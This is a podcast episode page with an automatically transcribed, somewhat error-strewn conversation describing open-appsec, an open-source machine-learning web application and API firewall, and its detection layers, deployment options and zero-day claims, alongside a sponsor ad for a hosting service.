Today's Deep-Dive: open-appsec
Ep. 267

Today's Deep-Dive: open-appsec

Episode description

This deep dive discusses open-appsec, a machine learning engine designed to revolutionize web application and API security. It aims to shift from reactive fixes to preemptive protection against major threats, including zero-day vulnerabilities. The system uses a two-phase approach: a supervised global model for known attack patterns and an unsupervised local model for real-time, application-specific learning. This dual-engine process ensures precise threat detection by understanding both global attack indicators and local application behaviors. The engine also includes comprehensive security layers such as API security, intrusion prevention, anti-bot capabilities, file security, and advanced rate limiting. It is designed for modern infrastructures, supporting cloud-native and CI/CD environments, and is open-source under the Apache 2.0 license. The technology promises to reduce the operational overhead of security teams, allowing them to focus on higher-level strategy. The page concludes by posing a thought-provoking question about the future role of security analysts in an era of preemptive, self-learning security solutions.

Gain digital sovereignty now and save costs

Let’s have a look at your digital challenges together. What tools are you currently using? Are your processes optimal? How is the state of backups and security updates?

Digital Souvereignty is easily achived with Open Source software (which usually cost way less, too). Our division Safeserver offers hosting, operation and maintenance for countless Free and Open Source tools.

Try it now for 1 Euro - 30 days free!

Download transcript (.srt)
0:00

Welcome to the deep dive your shortcut to getting up to speed quickly today. Our

0:04

mission is really focused

0:05

We're tackling one of the biggest headaches in digital security keeping web apps

0:08

and API safe

0:09

We are diving deep into the sources around open app sec

0:12

It's a machine learning engine and the promise here is pretty big fundamentally

0:16

changing web defense moving security away from you know

0:20

Reactive fixes towards automatic preemptive protection against the big stuff like

0:24

the OWASP top 10 and yeah

0:26

Even zero days now before we jump right in just a quick word this deep dive is

0:31

supported by safe server

0:32

They handle software hosting and can support you through your digital

0:35

transformation. You can find out more about them at

0:37

www.safeserver.de

0:39

Okay, let's get into it if you're in tech

0:42

You probably know the the pain of the traditional web application firewall the way

0:46

up that sits in front of your app in historically

0:48

Managing it it's a constant battle hours writing signatures exceptions dealing with

0:52

false positives. Yeah, that's exactly the context

0:55

The source material really positions open app sec as well the opposite of that high-maintenance

1:01

reality

1:02

They define it pretty simply a machine learning security engine one that

1:06

automatically and crucially preemptively

1:09

Stops threats against web apps and apis

1:11

The core idea isn't just catching known bad stuff

1:15

It's about learning what normal looks like for your specific application and that's

1:19

the bit that really grabs your attention, right?

1:21

Painless to configure and manage effective security and it's open source honestly

1:25

knowing the usual operational grind that almost sounds well

1:28

Too good to be true. Well, the claim really rests on two core ideas. They hammer

1:32

home

1:32

preemptive and precise

1:35

Preemptive means it acts without needing those constant signature updates. This is

1:39

where those pretty startling claims come in

1:41

They state it blocked major zero days like log4 shell and spring4 shell with no

1:46

prior knowledge. No updates needed

1:48

That's well, that's a huge deal. Wow. Okay, if that holds water, it means the

1:52

system isn't just matching patterns

1:54

It's understanding the attacks intent somehow precisely. Yeah, and that links

1:58

directly to the second idea

1:59

precision

2:02

Because the machine learning is continuously adapting to your environment. It

2:05

supposedly cuts down

2:06

Drastically on the noise, you know the false positives the endless exceptions that

2:11

make old-school wafts such a chore

2:13

Okay. So before we get into the ML engine itself the sort of brain of the operation

2:17

what happens first when a request comes in?

2:19

What's the groundwork? Right? It needs to fully understand the data first which can

2:23

be tricky

2:24

So for every single HTTP request the engine starts by decoding everything all the

2:29

parts of the payload

2:30

It pulls out any nested data specifically looking for JSON or XML sections hidden

2:34

inside

2:35

Only after it's fully parsed and understood the raw request and applied basic IP

2:40

checks

2:40

Then the machine learning part kicks in. Got it. So let's unpack that core

2:44

intelligence

2:45

The sources talk about a two-phase dual engine process not just one big AI model.

2:50

How does it figure out good versus bad?

2:51

Yeah, it's clever. It combines

2:53

Global knowledge with very specific local context. The main goal is spotting

2:59

requests that just don't fit the normal pattern

3:02

Things that fall outside how users should be interacting with the application. Okay

3:06

phase one

3:06

That's the supervised model the global schooling part. That's a great way to think

3:10

about it

3:11

Yeah, the supervised model is like the global expert

3:14

It's trained offline on a massive data set millions of requests both malicious

3:19

attack traffic and perfectly normal benign traffic

3:22

collected from all over

3:24

Think of it as the system's baseline understanding of known attack types seen

3:28

across the Internet

3:29

What kind of data does it look at it considers a whole range of things?

3:33

Known attack indicators the IP's reputation user agents browser fingerprints other

3:37

sort of contextual clues

3:39

It does a quick comparison does this incoming request look like any known global

3:43

attack patterns

3:44

The source has mentioned there's a basic model for say testing or monitoring only

3:48

but the advanced model

3:50

The one they recommend for production gets updated via their portal. It keeps

3:53

learning globally

3:54

Okay, so the supervised model acts as a first filter

3:57

Let's the obviously good stuff through flags that clearly bad based on global

4:02

patterns. But what about the gray area stuff?

4:05

That looks suspicious globally, but might be okay locally. That's where phase two

4:09

comes in. Exactly

4:10

That's the handoff if phase one says hmm

4:13

This looks risky or suspicious then the analysis moves to the unsupervised model

4:18

and this one is completely different

4:20

It's the local detective. It doesn't use that global training data instead

4:24

It builds its intelligence in real time right there in your protected environment.

4:28

Ah, okay

4:28

So it's learning the specific quirks and patterns of my application my users

4:33

I see it looks at hyper local context things like the exact URL being hit the usual

4:37

traffic patterns for that specific endpoint

4:39

Maybe the history of the user involved it uses this local perspective to generate a

4:43

final confidence score and that score decides

4:45

Block or allow it's that blend the global knowledge of attacks plus the specific

4:50

understanding of your applications behavior

4:52

That's supposed to deliver that promised precision interesting

4:55

So moving beyond just the core ML engine the sources indicate this isn't just a

5:00

simple filter even with the two phases

5:01

What other security layers are built in? It sounds like a sweep. It really is

5:05

presented as a comprehensive stack

5:07

Yeah bundled into one engine a big one for modern setups is API security

5:11

The engine apparently discovers your API is automatically and helps narrow the

5:15

attack surface

5:16

It can enforce strict open API schema validation making sure the API calls actually

5:21

look like they're supposed to

5:23

Exactly making sure the traffic fits the expected format and what about protection

5:27

against, you know standard known vulnerabilities

5:30

We still need that right? Absolutely, and that's integrated too. There's an

5:33

enhanced intrusion prevention system and IPS this protects against

5:37

I think the number was over 2,800

5:39

specific web CVEs known vulnerabilities

5:42

Uses NSS certified tech and an open snort 3.0 engine. So you get this smart ML

5:48

detection and strong defense against known exploits

5:50

Best of both worlds supposedly. Okay makes sense. What else bots are a huge problem.

5:56

Yep covered. They include anti-bot capabilities

5:58

designed to identify and stop automated attack scrapers

6:02

Intrusion attempts before they cause damage right that handles incoming traffic

6:06

threats

6:07

But what about uploads malicious files are a classic vector. Good point. They've

6:12

built in file security

6:13

It scans uploaded files automatically and it checks them against a big cloud

6:17

repository for known malicious file reputations

6:20

Helps stop nasty executables or scripts getting under your servers. Mmm. I was I

6:25

mentioned of some pretty

6:26

Advanced rate limiting controls more than just blocking IPs. Yeah, the rate

6:30

limiting seems quite flexible

6:32

You can set limits based not just on IP address

6:34

But on identifiers inside the session like, you know specific keys found in GWT's

6:39

JSON web tokens or maybe values and cookies or custom headers

6:42

That's really useful for protecting individual user accounts or API keys from brute

6:46

force or abuse. That is more granular

6:48

Definitely and one more interesting feature crowd wisdom. They partner with crowd

6:53

sec

6:53

This means the system gets real-time threat intelligence from I think it's over 64,000

7:00

contributing servers

7:01

So if an IP address starts attacking applications elsewhere on the network

7:05

Your system can learn about it almost instantly and block it proactively kind of a

7:08

neighborhood watch for servers

7:10

Okay, let's circle back to those zero-day claims because that's really the headline

7:14

grabber blocking log4 shell without a signature

7:17

How do the sources justify that confidence? It still sounds almost magical the

7:21

justification comes back to that unsupervised model the anomaly detection part

7:24

Because it learns normal so well anything drastically outside that norm gets flagged

7:30

Even if the specific intact method has never been seen before

7:32

The sources specifically list log4 shell spring4 shell also text4 show that Apache

7:39

text vulnerability CVE

7:40

2022 port 2 8 8 9 and they even mentioned a tricky wife bypass technique using JSON

7:47

syntax hidden in SQL injection payloads

7:49

In each case the argument is the system saw behavior or request structures that

7:54

were just weird

7:55

Highly anomalous compared to the learned baseline for that application. So it got

7:58

blocked regardless of the specific attack signature, right?

8:01

It's not matching a known bad pattern. It's spotting not normal. Okay, so thinking

8:06

about implementation if I'm running modern infrastructure cloud

8:08

Containers CICD pipelines. How does this fit in if the goal is painless it can

8:13

involve tearing everything down?

8:14

No, it seems designed explicitly for that. It's described as cloud native and CICD

8:20

friendly

8:21

You can deploy it using declarative methods like infrastructure as code or manage

8:25

it via API's

8:26

Platform wise it usually works as an add-on

8:29

You can deploy it with Linux Docker Kubernetes setups and it integrates with common

8:33

reverse proxies NG INX Kong API six

8:37

envoy

8:38

The usual suspects and management flexibility different teams have different

8:42

preferences seems like it

8:44

You can use declarative config files Kubernetes helm charts or annotations for that

8:48

automated k8s workflow

8:49

Or they offer a SAS web interface for managing it visually so options depending on

8:53

your operational style

8:54

Good good. And finally that open source aspect. That's pretty important for trust,

8:57

especially with security tools. Absolutely crucial

9:00

It's under the Apache 2.0 license. The core engine code is available

9:04

What's interesting architecturally is they seem to have separated the main logic

9:07

Which is mostly C++ for the bits that connect to the web server

9:11

Attachment and C and the part that sinks learning data between agents smart sync

9:15

and go

9:16

that modularity helps with auditing and critically the sources highlight an

9:20

independent third-party security audit was done on the code back in

9:24

2022 that definitely helps build confidence. Okay, this has been a really

9:28

insightful dive

9:29

We've traced the shift haven't we from those brittle signature based rules needing

9:34

constant tweaking that high maintenance of draft job

9:36

Towards something self-learning adaptive focused on preemptive defense

9:41

The big takeaway here seems to be about changing the operational overhead of

9:44

application security

9:46

Moving away from endless manual tuning. Let's security teams. Maybe focus on higher-level

9:50

strategy

9:51

It really could shift the focus and that leads to a really interesting question for

9:56

you the listener to think about

9:57

If this kind of technology truly becomes an install and forget solution one that

10:02

learns continuously and defends preemptively

10:05

What does that mean for the future role of the security analyst?

10:09

Particularly the ones whose main job today is that constant monitoring and fine-tuning

10:14

of complex security policies

10:15

That's the potential strategic shift to consider in your own planning a really

10:19

provocative thought to end on think about how that might change things

10:23

In your own environment or career. Thank you for joining us for this deep dive

10:26

And thanks once again to our sponsor safe server for making this exploration

10:30

possible

10:31

Remember to check out how they can support your software hosting and digital

10:34

transformation at

10:35

Join us next time on the deep dive

10:35

Join us next time on the deep dive